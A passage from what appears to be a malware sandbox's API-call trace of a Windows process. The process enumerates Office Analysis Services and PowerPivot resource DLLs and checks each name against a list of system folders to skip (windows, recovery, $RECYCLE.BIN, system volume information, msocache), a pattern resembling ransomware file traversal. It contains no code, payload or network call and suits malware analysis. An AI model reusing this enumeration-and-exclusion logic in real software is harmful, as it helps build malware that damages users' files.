(lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0125.831] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0125.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f720 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0125.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.832] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56ab5a1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56ab5a1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x201030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0125.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dde8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0125.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0125.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0125.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0125.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d770, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0125.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0125.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.832] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa806c3d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa806c3d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3038, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0125.832] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.833] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x688d06d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x688d06d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x688d06d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ca98, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MI93CC~1.DLL")) returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0125.833] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d698, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0125.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0125.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.834] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2ee20e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2f2e583, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28c8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0125.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dba8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0125.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0125.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d698, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0125.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e458 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0125.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0125.834] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56f7a52, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0125.834] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0125.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0125.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d0d8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0125.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0125.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0125.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0125.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0125.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0125.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0125.835] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x865a7d2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x865a7d2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x865a7d2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x47ae0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MIB24E~1.DLL")) returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0125.835] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0125.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d698, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 